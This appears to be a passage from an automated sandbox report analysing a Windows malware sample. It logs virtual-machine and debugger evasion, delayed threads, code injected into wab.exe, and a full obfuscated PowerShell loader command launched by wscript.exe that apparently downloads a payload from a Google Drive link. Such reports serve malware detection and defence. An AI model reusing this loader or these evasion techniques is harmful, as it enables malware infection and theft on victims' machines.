            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 2570000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22E30000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22C70000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5721
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4183
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6290
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3519
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3561
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 6277
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784 Thread sleep count: 6290 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784 Thread sleep count: 3519 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -24903104499507879s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -100000s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6488 Thread sleep count: 3561 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99875s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99765s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6488 Thread sleep count: 6277 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99656s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99544s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99437s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99328s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99219s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99109s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99000s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98886s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98778s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98672s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98562s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98453s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98341s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98233s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98125s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98015s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97906s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97797s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97687s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97578s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97468s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97359s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97250s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97140s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97031s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96921s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96801s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96672s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96562s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96442s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96312s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96202s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96094s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95969s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95859s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95740s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95609s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95390s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95281s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95171s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95062s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94953s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94844s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94734s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94625s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94515s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99544Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98886Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98778Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98341Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98233Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97906Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97687Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97468Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97359Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97250Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97140Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97031Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96921Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96801Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96442Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96202Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96094Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95969Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95859Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95740Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95609Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95500Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95281Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95171Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95062Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94844Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94625Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94515Jump to behavior
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
            Source: wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: powershell.exe, 00000004.00000002.1999089456.00000000074A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000001.00000002.2279767927.00000221EBE1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
            Source: wscript.exe, 00000000.00000003.1643712541.000002B3F1A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_025770B8 CheckRemoteDebuggerPresent,9_2_025770B8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_047CA758 LdrInitializeThunk,4_2_047CA758
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00621AE4 GetProcessHeap,HeapFree,10_2_00621AE4
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_006232C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_006232C0
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00623450 SetUnhandledExceptionFilter,10_2_00623450
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A60000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 257FE24
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
